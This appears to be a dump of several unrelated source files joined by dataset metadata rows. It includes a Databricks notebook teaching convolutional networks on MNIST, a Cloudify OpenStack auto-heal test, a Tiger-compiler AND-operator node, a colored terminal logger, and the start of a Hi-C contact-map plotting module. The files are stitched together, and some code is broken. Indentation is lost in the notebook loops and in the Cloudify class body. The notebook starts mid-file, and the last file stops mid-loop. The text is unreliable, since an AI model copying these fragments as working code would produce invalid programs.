# MAGIC <img src="http://i.imgur.com/F8eH3vj.png">
# MAGIC
# MAGIC ## Ok, let's build our first ConvNet:
# MAGIC
# MAGIC First, we want to explicity shape our data into a 2-D configuration. We'll end up with a 4-D tensor where the first dimension is the training examples, then each example is 28x28 pixels, and we'll explicitly say it's 1-layer deep. (Why? with color images, we typically process over 3 or 4 channels in this last dimension)
# MAGIC
# MAGIC A step by step animation follows:
# MAGIC * http://cs231n.github.io/assets/conv-demo/index.html
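# COMMAND ----------
# Illustrative aside (not used by the models below): "valid" 2-D convolution and 2x2 max
# pooling written with plain numpy loops, to make the two operations concrete. (Strictly
# this is cross-correlation -- the kernel is not flipped -- matching deep-learning usage.)
import numpy as np
def conv2d_valid(image, kernel):
    kh, kw = kernel.shape
    out = np.zeros((image.shape[0] - kh + 1, image.shape[1] - kw + 1))
    for i in range(out.shape[0]):
        for j in range(out.shape[1]):
            out[i, j] = np.sum(image[i:i+kh, j:j+kw] * kernel)  # dot product with one patch
    return out
def max_pool_2x2(fmap):
    out = np.zeros((fmap.shape[0] // 2, fmap.shape[1] // 2))
    for i in range(out.shape[0]):
        for j in range(out.shape[1]):
            out[i, j] = fmap[2*i:2*i+2, 2*j:2*j+2].max()        # strongest match in the window
    return out
demo_img = np.random.rand(6, 6)
demo_kernel = np.array([[1., -1.], [1., -1.]])                  # a crude vertical-edge detector
print(max_pool_2x2(conv2d_valid(demo_img, demo_kernel)))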
# COMMAND ----------
train_libsvm = "/dbfs/databricks-datasets/mnist-digits/data-001/mnist-digits-train.txt"
test_libsvm = "/dbfs/databricks-datasets/mnist-digits/data-001/mnist-digits-test.txt"
X_train, y_train = sklearn.datasets.load_svmlight_file(train_libsvm, n_features=784)
X_train = X_train.toarray()
X_test, y_test = sklearn.datasets.load_svmlight_file(test_libsvm, n_features=784)
X_test = X_test.toarray()
X_train = X_train.reshape( (X_train.shape[0], 28, 28, 1) )
X_train = X_train.astype('float32')
X_train /= 255
y_train = to_categorical(y_train, num_classes=10)
X_test = X_test.reshape( (X_test.shape[0], 28, 28, 1) )
X_test = X_test.astype('float32')
X_test /= 255
y_test = to_categorical(y_test, num_classes=10)
# COMMAND ----------
# MAGIC %md
# MAGIC Now the model:
# COMMAND ----------
from keras.layers import Dense, Dropout, Activation, Flatten, Conv2D, MaxPooling2D
model = Sequential()
model.add(Conv2D(8, # number of kernels
(4, 4), # kernel size
padding='valid', # no padding; output will be smaller than input
input_shape=(28, 28, 1)))
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=(2,2)))
model.add(Flatten())
model.add(Dense(128))
model.add(Activation('relu')) # alternative syntax for applying activation
model.add(Dense(10))
model.add(Activation('softmax'))
model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])
# COMMAND ----------
# MAGIC %md
# MAGIC ... and the training loop and output:
# COMMAND ----------
start = datetime.datetime.today()
history = model.fit(X_train, y_train, batch_size=128, epochs=8, verbose=2, validation_split=0.1)
scores = model.evaluate(X_test, y_test, verbose=1)
print
for i in range(len(model.metrics_names)):
print("%s: %f" % (model.metrics_names[i], scores[i]))
# COMMAND ----------
fig, ax = plt.subplots()
fig.set_size_inches((5,5))
plt.plot(history.history['loss'])
plt.plot(history.history['val_loss'])
plt.title('model loss')
plt.ylabel('loss')
plt.xlabel('epoch')
plt.legend(['train', 'val'], loc='upper left')
display(fig)
# COMMAND ----------
# MAGIC %md
# MAGIC ### Our MNIST ConvNet
# MAGIC
# MAGIC In our first convolutional MNIST experiment, we get to almost 99% validation accuracy in just a few epochs (a minutes or so on CPU)!
# MAGIC
# MAGIC The training accuracy is effectively 100%, though, so we've almost completely overfit (i.e., memorized the training data) by this point and need to do a little work if we want to keep learning.
# MAGIC
# MAGIC Let's add another convolutional layer:
# COMMAND ----------
model = Sequential()
model.add(Conv2D(8, # number of kernels
(4, 4), # kernel size
padding='valid',
input_shape=(28, 28, 1)))
model.add(Activation('relu'))
model.add(Conv2D(8, (4, 4)))
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=(2,2)))
model.add(Flatten())
model.add(Dense(128))
model.add(Activation('relu'))
model.add(Dense(10))
model.add(Activation('softmax'))
model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])
history = model.fit(X_train, y_train, batch_size=128, epochs=15, verbose=2, validation_split=0.1)
scores = model.evaluate(X_test, y_test, verbose=1)
print
for i in range(len(model.metrics_names)):
print("%s: %f" % (model.metrics_names[i], scores[i]))
# COMMAND ----------
# MAGIC %md
# MAGIC While that's running, let's look at a number of "famous" convolutional networks!
# MAGIC
# MAGIC ### LeNet (Yann LeCun, 1998)
# MAGIC
# MAGIC <img src="http://i.imgur.com/k5hMtMK.png">
# MAGIC
# MAGIC <img src="http://i.imgur.com/ERV9pHW.gif">
# COMMAND ----------
# MAGIC %md <img src="http://i.imgur.com/TCN9C4P.png">
# COMMAND ----------
# MAGIC %md
# MAGIC ### AlexNet (2012)
# MAGIC
# MAGIC <img src="http://i.imgur.com/CpokDKV.jpg">
# MAGIC
# MAGIC <img src="http://i.imgur.com/Ld2QhXr.jpg">
# COMMAND ----------
# MAGIC %md
# MAGIC ### Back to our labs: Still Overfitting
# MAGIC
# MAGIC We're making progress on our test error -- about 99% -- but just a bit for all the additional time, due to the network overfitting the data.
# MAGIC
# MAGIC There are a variety of techniques we can take to counter this -- forms of regularization.
# MAGIC
# MAGIC Let's try a relatively simple solution that works surprisingly well: add a pair of `Dropout` filters, a layer that randomly omits a fraction of neurons from each training batch (thus exposing each neuron to only part of the training data).
# MAGIC
# MAGIC We'll add more convolution kernels but shrink them to 3x3 as well.
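# COMMAND ----------
# Illustrative aside (not part of the model): what dropout does during training -- for each
# batch a random fraction of activations is zeroed out, and the kept ones are rescaled
# ("inverted dropout") so the expected activation stays the same.
import numpy as np
demo_activations = np.ones(10)
drop_rate = 0.25                                              # as in Dropout(rate=0.25) below
demo_mask = (np.random.rand(10) >= drop_rate).astype(float)   # 1 = keep, 0 = drop
print(demo_activations * demo_mask / (1.0 - drop_rate))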
# COMMAND ----------
model = Sequential()
model.add(Conv2D(32, # number of kernels
(3, 3), # kernel size
padding='valid',
input_shape=(28, 28, 1)))
model.add(Activation('relu'))
model.add(Conv2D(32, (3, 3)))
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=(2,2)))
model.add(Dropout(rate=0.25)) # <- regularize; rate is the fraction of units to drop
model.add(Flatten())
model.add(Dense(128))
model.add(Activation('relu'))
model.add(Dropout(rate=0.5)) # <- regularize; rate is the fraction of units to drop
model.add(Dense(10))
model.add(Activation('softmax'))
model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])
history = model.fit(X_train, y_train, batch_size=128, epochs=15, verbose=2)
scores = model.evaluate(X_test, y_test, verbose=2)
print
for i in range(len(model.metrics_names)):
print("%s: %f" % (model.metrics_names[i], scores[i]))
# COMMAND ----------
# MAGIC %md
# MAGIC While that's running, let's look at some more recent ConvNet architectures:
# MAGIC
# MAGIC ### VGG16 (2014)
# MAGIC
# MAGIC <img src="http://i.imgur.com/gl4kZDf.png">
# COMMAND ----------
# MAGIC %md
# MAGIC ### GoogLeNet (2014)
# MAGIC
# MAGIC <img src="http://i.imgur.com/hvmtDqN.png">
# MAGIC
# MAGIC *"Inception" layer: parallel convolutions at different resolutions*
# MAGIC
# MAGIC ### Residual Networks (2015-)
# MAGIC
# MAGIC Skip layers to improve training (error propagation). Residual layers learn from details at multiple previous layers.
# MAGIC
# MAGIC <img src="http://i.imgur.com/32g8Ykl.png">
# COMMAND ----------
# MAGIC %md
# MAGIC ---
# MAGIC
# MAGIC > __ASIDE: Atrous / Dilated Convolutions__
# MAGIC
# MAGIC > An atrous or dilated convolution is a convolution filter with "holes" in it. Effectively, it is a way to enlarge the filter spatially while not adding as many parameters or attending to every element in the input.
# MAGIC
# MAGIC > Why? Covering a larger input volume allows recognizing coarser-grained patterns; restricting the number of parameters is a way of regularizing or constraining the capacity of the model, making training easier.
# MAGIC
# MAGIC ---
# COMMAND ----------
# MAGIC %md
# MAGIC ## *Lab Wrapup*
# MAGIC
# MAGIC From the last lab, you should have a test accuracy of over 99.1%
# MAGIC
# MAGIC For one more activity, try changing the optimizer to old-school "sgd" -- just to see how far we've come with these modern gradient descent techniques in the last few years.
# MAGIC
# MAGIC Accuracy will end up noticeably worse ... about 96-97% test accuracy. Two key takeaways:
# MAGIC
# MAGIC * Without a good optimizer, even a very powerful network design may not achieve results
# MAGIC * In fact, we could replace the word "optimizer" there with
# MAGIC * initialization
# MAGIC * activation
# MAGIC * regularization
# MAGIC * (etc.)
# MAGIC * All of these elements we've been working with operate together in a complex way to determine final performance
# COMMAND ----------
# MAGIC %md
# MAGIC Of course this world evolves fast - see the new kid in the CNN block -- **capsule networks**
# MAGIC
# MAGIC > Hinton: “The pooling operation used in convolutional neural networks is a big mistake and the fact that it works so well is a disaster.”
# MAGIC
# MAGIC Well worth the 8 minute read:
# MAGIC * [https://medium.com/ai%C2%B3-theory-practice-business/understanding-hintons-capsule-networks-part-i-intuition-b4b559d1159b](https://medium.com/ai%C2%B3-theory-practice-business/understanding-hintons-capsule-networks-part-i-intuition-b4b559d1159b)
# MAGIC
# MAGIC To understand deeper:
# MAGIC * original paper: [https://arxiv.org/abs/1710.09829](https://arxiv.org/abs/1710.09829)
# MAGIC
# MAGIC [Keras capsule network example](https://keras.io/examples/cifar10_cnn_capsule/)
# COMMAND ----------
# MAGIC %md
# MAGIC # More resources
# MAGIC
# MAGIC - http://www.wildml.com/2015/12/implementing-a-cnn-for-text-classification-in-tensorflow/
# MAGIC - https://openai.com/
# COMMAND ----------
| unlicense | 1,029,960,627,330,714,800 | 38.554386 | 455 | 0.712499 | false |
isaac-s/cloudify-system-tests | cosmo_tester/test_suites/test_blueprints/nodecellar_test_autoheal.py | 1 | 5154 | ########
# Copyright (c) 2014 GigaSpaces Technologies Ltd. All rights reserved
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# * See the License for the specific language governing permissions and
# * limitations under the License.
import time
import requests
from cosmo_tester.framework.git_helper import clone
from cosmo_tester.framework.util import YamlPatcher
from cosmo_tester.test_suites.test_blueprints.nodecellar_test import (
OpenStackNodeCellarTestBase)
class OpenStackAutohealNodeCellarTest(OpenStackNodeCellarTestBase):
AUTOHEAL_GROUP_YAML = {
'autohealing_group': {
'members': ['nodejs_host'],
'policies': {
'simple_autoheal_policy': {
'type': 'cloudify.policies.types.host_failure',
'properties': {
'service': ['cpu.total.system']
},
'triggers': {
'auto_heal_trigger': {
'type':
'cloudify.policies.triggers.execute_workflow',
'parameters': {
'workflow': 'heal',
'workflow_parameters': {
'node_instance_id': {
'get_property': ['SELF', 'node_id']
},
'diagnose_value': {
'get_property': ['SELF', 'diagnose']
},
}
}
}
}
}
}
}
}
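    # For reference (hand-translated from the dict above, not copied from any blueprint),
    # the group merged into the blueprint corresponds to YAML along these lines:
    #
    #   autohealing_group:
    #     members: [nodejs_host]
    #     policies:
    #       simple_autoheal_policy:
    #         type: cloudify.policies.types.host_failure
    #         properties:
    #           service: [cpu.total.system]
    #         triggers:
    #           auto_heal_trigger:
    #             type: cloudify.policies.triggers.execute_workflow
    #             parameters:
    #               workflow: heal
    #               workflow_parameters:
    #                 node_instance_id: {get_property: [SELF, node_id]}
    #                 diagnose_value: {get_property: [SELF, diagnose]}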
def _test_nodecellar_impl(self, blueprint_file):
self.repo_dir = clone(self.repo_url, self.workdir)
self.blueprint_yaml = self.repo_dir / blueprint_file
self.modify_blueprint()
before_install, after_install = self.upload_deploy_and_execute_install(
inputs=self.get_inputs()
)
self.post_install_assertions(before_install, after_install)
self.kill_nodejs_vm()
# make sure nodecellar is down
self.assert_nodecellar_down(self.public_ip)
self.wait_for_autoheal(after_install)
after_autoheal = self.get_manager_state()
self.post_autoheal_assertions(after_install, after_autoheal)
self.execute_uninstall()
self.post_uninstall_assertions()
def kill_nodejs_vm(self, timeout=10):
end = time.time() + timeout
nova_controller, _, _ = self.env.handler.openstack_clients()
srv = [s for s in nova_controller.servers.list() if 'nodejs' in s.name]
self.assertEqual(len(srv), 1)
srv = srv[0]
srv.delete()
while time.time() < end and srv in nova_controller.servers.list():
time.sleep(1)
def get_autoheal_execution(self):
executions = self.client.executions.list(
deployment_id=self.deployment_id)
for e in executions:
if e.workflow_id == 'heal':
return e
return None
def wait_for_autoheal(self, before, timeout=1200):
end = time.time() + timeout
autoheal_execution = None
while time.time() < end:
autoheal_execution = self.get_autoheal_execution()
if autoheal_execution is not None:
break
time.sleep(10)
self.assertIsNotNone(autoheal_execution, msg="Timed out waiting "
"for auto-heal workflow")
self.wait_for_execution(autoheal_execution, end - time.time())
def assert_nodecellar_down(self, public_ip):
with self.assertRaises(requests.ConnectionError):
requests.get('http://{0}:8080'.format(self.public_ip))
def post_autoheal_assertions(self, before_state, after_state):
delta = self.get_manager_state_delta(before_state, after_state)
for key in ['blueprints', 'deployments', 'node_state',
'nodes', 'deployment_nodes']:
self.assertEqual(len(delta[key]), 0)
self.assert_nodecellar_working(self.public_ip)
def modify_blueprint(self):
with YamlPatcher(self.blueprint_yaml) as patch:
patch.merge_obj('groups', self.AUTOHEAL_GROUP_YAML)
print self.blueprint_yaml
def get_inputs(self):
return {
'image': self.env.ubuntu_image_id,
'flavor': self.env.small_flavor_id,
'agent_user': 'ubuntu'
}
def test_openstack_autoheal_nodecellar(self):
self._test_openstack_nodecellar('openstack-blueprint.yaml')
| apache-2.0 | -1,801,459,323,801,139,700 | 35.295775 | 79 | 0.556849 | false |
yasserglez/pytiger2c | packages/pytiger2c/ast/andoperatornode.py | 1 | 2345 | # -*- coding: utf-8 -*-
"""
C{AndOperatorNode} class of the abstract syntax tree.
"""
from pytiger2c.ast.binarylogicaloperatornode import BinaryLogicalOperatorNode
from pytiger2c.types.integertype import IntegerType
class AndOperatorNode(BinaryLogicalOperatorNode):
"""
    C{AndOperatorNode} class of the abstract syntax tree.
    Represents the logical C{AND} operation, written with the C{&} operator
    in Tiger, between two integer numbers. This operator returns 1 when the
    result of evaluating the expression is true, and 0 otherwise.
"""
def __init__(self, left, right):
"""
        Initializes the C{AndOperatorNode} class.
        For information about the parameters received by this method, see
        the documentation of the C{__init__} method in the
        C{BinaryOperatorNode} class.
"""
super(AndOperatorNode, self).__init__(left, right)
def generate_code(self, generator):
"""
        Generates the C code corresponding to the Tiger language structure
        represented by the node.
        @type generator: C{CodeGenerator}
        @param generator: Helper class used in the generation of the C code
            corresponding to a Tiger program.
        @raise CodeGenerationError: This exception is raised when an error
            occurs during the generation of the code corresponding to the node.
            The exception contains information about the error.
"""
self.scope.generate_code(generator)
result_var = generator.define_local(IntegerType().code_type)
self.left.generate_code(generator)
generator.add_statement('if (!{left}) {{'.format(left=self.left.code_name))
generator.add_statement('{result} = 0; }}'.format(result=result_var))
generator.add_statement('else {')
self.right.generate_code(generator)
generator.add_statement('if ({right}) {{'.format(right=self.right.code_name))
generator.add_statement('{result} = 1; }}'.format(result=result_var))
generator.add_statement('else {')
generator.add_statement('{result} = 0; }}'.format(result=result_var))
generator.add_statement('}')
self._code_name = result_var
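# For reference (illustrative shape only; the actual result type and variable names come
# from CodeGenerator and IntegerType), the C emitted for "a & b" short-circuits on the
# left operand:
#
#   int result;
#   /* ...code for the left operand... */
#   if (!left) { result = 0; }
#   else {
#       /* ...code for the right operand... */
#       if (right) { result = 1; }
#       else { result = 0; }
#   }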
| mit | -9,185,024,468,901,850,000 | 41.181818 | 85 | 0.663362 | false |
rubik/pyg | pyg/log.py | 1 | 8604 | import os
import sys
import logging
__all__ = ['logger']
try:
from colorama import init, Fore, Style
init(autoreset=False)
colors = {
'good' : Fore.GREEN,
'bad' : Fore.RED,
'vgood' : Fore.GREEN + Style.BRIGHT,
'vbad' : Fore.RED + Style.BRIGHT,
'std' : '', # Do not color "standard" text
'warn' : Fore.YELLOW + Style.BRIGHT,
'reset' : Style.RESET_ALL,
}
except ImportError:
colors = {
'good' : '',
'bad' : '',
'vgood' : '',
'vbad' : '',
'std' : '',
'warn' : '',
'reset' : '',
}
def get_console_width():
"""
Return width of available window area. Autodetection works for
Windows and POSIX platforms. Returns 80 for others
Code from http://bitbucket.org/techtonik/python-wget
"""
if os.name == 'nt':
STD_INPUT_HANDLE = -10
STD_OUTPUT_HANDLE = -11
STD_ERROR_HANDLE = -12
# get console handle
from ctypes import windll, Structure, byref
try:
from ctypes.wintypes import SHORT, WORD, DWORD
except ImportError:
# workaround for missing types in Python 2.5
from ctypes import (
c_short as SHORT, c_ushort as WORD, c_ulong as DWORD)
console_handle = windll.kernel32.GetStdHandle(STD_OUTPUT_HANDLE)
# CONSOLE_SCREEN_BUFFER_INFO Structure
class COORD(Structure):
_fields_ = [("X", SHORT), ("Y", SHORT)]
class SMALL_RECT(Structure):
_fields_ = [("Left", SHORT), ("Top", SHORT),
("Right", SHORT), ("Bottom", SHORT)]
class CONSOLE_SCREEN_BUFFER_INFO(Structure):
_fields_ = [("dwSize", COORD),
("dwCursorPosition", COORD),
("wAttributes", WORD),
("srWindow", SMALL_RECT),
("dwMaximumWindowSize", DWORD)]
sbi = CONSOLE_SCREEN_BUFFER_INFO()
ret = windll.kernel32.GetConsoleScreenBufferInfo(console_handle, byref(sbi))
if ret == 0:
return 0
return sbi.srWindow.Right+1
elif os.name == 'posix':
from fcntl import ioctl
from termios import TIOCGWINSZ
from array import array
winsize = array("H", [0] * 4)
try:
ioctl(sys.stdout.fileno(), TIOCGWINSZ, winsize)
except IOError:
pass
return (winsize[1], winsize[0])[0]
return 80
class Logger(object):
VERBOSE = logging.DEBUG - 1
DEBUG = logging.DEBUG
INFO = logging.INFO
WARN = logging.WARNING
ERROR = logging.ERROR
FATAL = logging.FATAL
## This attribute is set to True when the user does not want colors
## by __init__.py
_NO_COLORS = False
def __init__(self,level=None):
self.indent = 0
self.level = level or Logger.INFO
self._stack = ['']
self.enabled = True
def disable_colors(self):
self._NO_COLORS = True
for k in colors.keys():
colors[k] = ''
def newline(self):
'''Print a newline character (\n) on Standard Output.'''
sys.stdout.write('\n')
def raise_last(self, exc):
raise exc(self.last_msg)
@property
def last_msg(self):
return self._stack[-1]
def ask(self, message=None, bool=None, choices=None, dont_ask=False):
if bool is not None:
if bool in (True, False) or (isinstance(bool, (list, tuple)) and len(bool) == 1):
if bool == False:
txt = "Cancel"
elif bool == True:
txt = "OK"
else:
txt = bool[0]
self.log(self.info, 'std', "%s, %s..."%(message, txt), addn=False)
if not dont_ask:
raw_input()
return
else:
if dont_ask:
self.log(self.info, 'std', '%s ? Yes'%message)
return True
while True:
self.log(self.info, 'std', "yes: "+bool[0])
self.log(self.info, 'std', "no: "+bool[1])
try:
self.log(self.info, 'std', '%s ? (y/[n]) '%message, addn=False)
ans = raw_input()
except Exception:
continue
# default choice : no
if not ans.strip():
return False
if ans not in 'yYnN':
continue
return ans in 'yY'
if choices:
if isinstance(choices, dict):
_data = choices
choices = choices.keys()
else:
_data = None
self.log(self.info, 'std', message)
for n, choice in enumerate(choices):
self.log(self.info, 'std', "%2d - %s"%(n+1, choice))
while True:
try:
ans = input('Your choice ? ')
except Exception:
self.log(self.info, 'std', "Please enter selected option's number.")
continue
if ans < 0 or ans > len(choices):
continue
break
idx = choices[ans-1]
return (_data[idx] if _data else idx)
def verbose(self, msg, *a, **kw):
self.log(self.VERBOSE, 'std', msg, *a, **kw)
def debug(self, msg, *a, **kw):
self.log(self.DEBUG, 'std', msg, *a, **kw)
def info(self, msg, *a, **kw):
self.log(self.INFO, 'std', msg, *a, **kw)
def success(self, msg, *a, **kw):
self.log(self.INFO, 'good', msg, *a, **kw)
def warn(self, msg, *a, **kw):
self.log(self.WARN, 'warn', msg, *a, **kw)
def error(self, msg, *a, **kw):
self.log(self.ERROR, 'bad', msg, *a, **kw)
exc = kw.get('exc', None)
if exc is not None:
raise exc(self.last_msg)
def fatal(self, msg, *a, **kw):
self.log(self.FATAL, 'vbad', msg, *a, **kw)
exc = kw.get('exc', None)
if exc is not None:
raise exc(self.last_msg)
def exit(self, msg=None, status=1):
if msg != None:
self.log(self.FATAL, 'vbad', msg)
sys.exit(status)
def log(self, level, col, msg, *a, **kw):
'''
This is the base function that logs all messages. This function prints a newline character too,
unless you specify ``addn=False``. When the message starts with a return character (\r) it automatically
cleans the line.
'''
if level >= self.level and self.enabled:
std = sys.stdout
if level >= self.ERROR:
std = sys.stderr
## We can pass to logger.log any object: it must have at least
## a __repr__ or a __str__ method.
msg = str(msg)
if msg.startswith('\r') or self.last_msg.startswith('\r'):
## We have to clear the line in case this message is longer than
## the previous
std.write('\r' + ' ' * get_console_width())
msg = '\r' + ' ' * self.indent + msg.lstrip('\r').format(*a)
else:
try:
msg = ' ' * self.indent + msg.format(*a)
except KeyError:
msg = ' ' * self.indent + msg
col, col_reset = colors[col], colors['reset']
if self._NO_COLORS:
col, col_reset = '', ''
std.write(col + msg + col_reset)
## Automatically adds a newline character
if kw.get('addn', True):
self.newline()
## flush() makes the log immediately readable
std.flush()
self._stack.append(msg)
logger = Logger()
if __name__ == '__main__':
print logger.ask("Beware, you enter a secret place", bool=True)
print logger.ask("Sorry, can't install this package", bool=False)
print logger.ask("Sorry, can't install this package", bool=['Press any key to continue'])
print logger.ask('Proceed', bool=('remove files', 'cancel'))
print logger.ask('Do you want to upgrade', bool=('upgrade version', 'keep working version'))
print logger.ask('Installation method', choices=('Egg based', 'Flat directory'))
print logger.ask('some dict', choices={'choice a': 'a', 'choice b': 'b', 'choice c': 'c'})
| mit | 6,918,560,899,047,315,000 | 30.866667 | 112 | 0.496165 | false |
3DGenomes/tadbit | _pytadbit/mapping/analyze.py | 1 | 67679 | """
18 Nov 2014
"""
from warnings import warn
from collections import OrderedDict
from pysam import AlignmentFile
from scipy.stats import norm as sc_norm, skew, kurtosis
from scipy.stats import pearsonr, spearmanr, linregress
from scipy.sparse.linalg import eigsh
from numpy.linalg import eigh
import numpy as np
try:
from matplotlib import rcParams
from matplotlib import pyplot as plt
from matplotlib.backends.backend_pdf import PdfPages
from matplotlib.colors import LinearSegmentedColormap
except ImportError:
warn('matplotlib not found\n')
from pytadbit import HiC_data
from pytadbit.utils.extraviews import tadbit_savefig, setup_plot
from pytadbit.utils.tadmaths import nozero_log_matrix as nozero_log
from pytadbit.utils.tadmaths import right_double_mad as mad
from pytadbit.parsers.hic_parser import load_hic_data_from_reads
from pytadbit.utils.extraviews import nicer
from pytadbit.utils.file_handling import mkdir
def hic_map(data, resolution=None, normalized=False, masked=None,
by_chrom=False, savefig=None, show=False, savedata=None,
focus=None, clim=None, perc_clim=None, cmap='jet', pdf=False, decay=True,
perc=20, name=None, decay_resolution=None, **kwargs):
"""
function to retrieve data from HiC-data object. Data can be stored as
a square matrix, or drawn using matplotlib
:param data: can be either a path to a file with pre-processed reads
(filtered or not), or a Hi-C-data object
:param None resolution: at which to bin the data (try having a dense matrix
with < 10% of cells with zero interaction counts). Note: not necessary
if a hic_data object is passed as 'data'.
:param False normalized: used normalized data, based on precalculated biases
    :param masked: a list of columns to be removed. Usually because too few
interactions
:param False by_chrom: data can be stored in a partitioned way. This
parameter can take the values of:
* 'intra': one output per each chromosome will be created
* 'inter': one output per each possible pair of chromosome will be
created
* 'all' : both of the above outputs
:param None savefig: path where to store the output images. Note that, if
the by_chrom option is used, then savefig will be the name of the
directory containing the output files.
:param None savedata: path where to store the output matrices. Note that, if
the by_chrom option is used, then savefig will be the name of the
directory containing the output files.
:param None focus: can be either two number (i.e.: (1, 100)) specifying the
start and end position of the sub-matrix to display (start and end, along
the diagonal of the original matrix); or directly a chromosome name; or
two chromosome names (i.e.: focus=('chr2, chrX')), in order to store the
data corresponding to inter chromosomal interactions between these two
chromosomes
:param True decay: plot the correlation between genomic distance and
interactions (usually a decay).
    :param False force_image: force image generation even if the resolution is
       very high (i.e. the matrix is very large)
:param None clim: cutoff for the upper and lower bound in the coloring scale
of the heatmap. (perc_clim should be set to None)
:param None perc_clim: cutoff for the upper and lower bound in the coloring scale
of the heatmap; in percentile. (clim should be set to None)
    :param False pdf: when using the by_chrom option, to specify the format of
the stored images
:param jet cmap: color map to be used for the heatmap; "tadbit" color map is
also implemented and will use percentiles of the distribution of
       interactions to define intensities of red.
:param None decay_resolution: chromatin fragment size to consider when
calculating decay of the number of interactions with genomic distance.
Default is equal to resolution of the matrix.
"""
if isinstance(data, str):
data = load_hic_data_from_reads(data, resolution=resolution, **kwargs)
if not kwargs.get('get_sections', True) and decay:
        warn('WARNING: decay plot not available when get_sections is off.')
decay = False
if clim and perc_clim:
raise Exception('ERROR: only one of clim or perc_clim should be set\n')
hic_data = data
resolution = data.resolution
if not decay_resolution:
decay_resolution = resolution
if hic_data.bads and not masked:
masked = hic_data.bads
# save and draw the data
if by_chrom:
if focus:
raise Exception('Incompatible options focus and by_chrom\n')
if savedata:
mkdir(savedata)
if savefig:
mkdir(savefig)
for i, crm1 in enumerate(hic_data.chromosomes):
for crm2 in hic_data.chromosomes.keys()[i:]:
if by_chrom == 'intra' and crm1 != crm2:
continue
if by_chrom == 'inter' and crm1 == crm2:
continue
try:
subdata = hic_data.get_matrix(focus=(crm1, crm2), normalized=normalized)
start1, _ = hic_data.section_pos[crm1]
start2, _ = hic_data.section_pos[crm2]
masked1 = {}
masked2 = {}
if focus and hic_data.bads:
# rescale masked
masked1 = dict([(m - start1, hic_data.bads[m])
for m in hic_data.bads])
masked2 = dict([(m - start2, hic_data.bads[m])
for m in hic_data.bads])
if masked1 or masked2:
for i in xrange(len(subdata)):
if i in masked1:
subdata[i] = [float('nan')
for j in xrange(len(subdata))]
for j in xrange(len(subdata)):
if j in masked2:
subdata[i][j] = float('nan')
if savedata:
hic_data.write_matrix('%s/%s.mat' % (
savedata, '_'.join(set((crm1, crm2)))),
focus=(crm1, crm2),
normalized=normalized)
if show or savefig:
if (len(subdata) > 10000
and not kwargs.get('force_image', False)):
warn('WARNING: Matrix image not created, more than '
'10000 rows, use a lower resolution to create images')
continue
draw_map(subdata,
OrderedDict([(k, hic_data.chromosomes[k])
for k in hic_data.chromosomes.keys()
if k in [crm1, crm2]]),
hic_data.section_pos,
'%s/%s.%s' % (savefig,
'_'.join(set((crm1, crm2))),
'pdf' if pdf else 'png'),
show, one=True, clim=clim, perc_clim=perc_clim,
cmap=cmap, decay_resolution=decay_resolution,
perc=perc, name=name, cistrans=float('NaN'))
except ValueError, e:
print 'Value ERROR: problem with chromosome %s' % crm1
print str(e)
except IndexError, e:
print 'Index ERROR: problem with chromosome %s' % crm1
print str(e)
else:
if savedata:
hic_data.write_matrix(savedata, focus=focus,
normalized=normalized)
if show or savefig:
subdata = hic_data.get_matrix(focus=focus, normalized=normalized)
if (len(subdata) > 10000 and not kwargs.get('force_image', False)):
warn('WARNING: Matrix image not created, more than '
'10000 rows, use a lower resolution to create images')
return
start1 = hic_data._focus_coords(focus)[0]
if focus and masked:
# rescale masked
masked = dict([(m - start1, masked[m]) for m in masked])
if masked:
for i in xrange(len(subdata)):
if i in masked:
subdata[i] = [float('nan')
for j in xrange(len(subdata))]
for j in xrange(len(subdata)):
if j in masked:
subdata[i][j] = float('nan')
draw_map(subdata,
{} if focus else hic_data.chromosomes,
hic_data.section_pos, savefig, show,
one = True if focus else False, decay=decay,
clim=clim, perc_clim=perc_clim, cmap=cmap,
decay_resolution=decay_resolution,
perc=perc, normalized=normalized,
max_diff=kwargs.get('max_diff', None),
name=name, cistrans=float('NaN') if focus else
hic_data.cis_trans_ratio(normalized,
kwargs.get('exclude', None),
kwargs.get('diagonal', True),
kwargs.get('equals', None)))
def draw_map(data, genome_seq, cumcs, savefig, show, one=False, clim=None,
perc_clim=None, cmap='jet', decay=False, perc=20, name=None,
cistrans=None, decay_resolution=10000, normalized=False,
max_diff=None):
_ = plt.figure(figsize=(15.,12.5))
if not max_diff:
max_diff = len(data)
ax1 = plt.axes([0.34, 0.08, 0.6, 0.7205])
ax2 = plt.axes([0.07, 0.65, 0.21, 0.15])
if decay:
ax3 = plt.axes([0.07, 0.42, 0.21, 0.15])
plot_distance_vs_interactions(data, genome_seq=genome_seq, axe=ax3,
resolution=decay_resolution,
max_diff=max_diff, normalized=normalized)
ax4 = plt.axes([0.34, 0.805, 0.6, 0.04], sharex=ax1)
ax5 = plt.axes([0.34, 0.845, 0.6, 0.04], sharex=ax1)
ax6 = plt.axes([0.34, 0.885, 0.6, 0.04], sharex=ax1)
try:
minoridata = np.nanmin(data)
maxoridata = np.nanmax(data)
except AttributeError:
vals = [i for d in data for i in d if not np.isnan(i)]
minoridata = np.min(vals)
maxoridata = np.max(vals)
totaloridata = np.nansum([data[i][j] for i in xrange(len(data))
for j in xrange(i, len(data[i]))]) # may not be square
data = nozero_log(data, np.log2)
vals = np.array([i for d in data for i in d])
vals = vals[np.isfinite(vals)]
if perc_clim:
try:
clim = np.percentile(vals, perc_clim[0]), np.percentile(vals, perc_clim[1])
except ValueError:
clim = None
mindata = np.nanmin(vals)
maxdata = np.nanmax(vals)
diff = maxdata - mindata
norm = lambda x: (x - mindata) / diff
posI = 0.01 if not clim else norm(clim[0]) if clim[0] != None else 0.01
posF = 1.0 if not clim else norm(clim[1]) if clim[1] != None else 1.0
if cmap == 'tadbit':
cuts = perc
cdict = {'red' : [(0.0, 1.0, 1.0)],
'green': [(0.0, 1.0, 1.0)],
'blue' : [(0.0, 1.0, 1.0)]}
for i in np.linspace(posI, posF, cuts, endpoint=False):
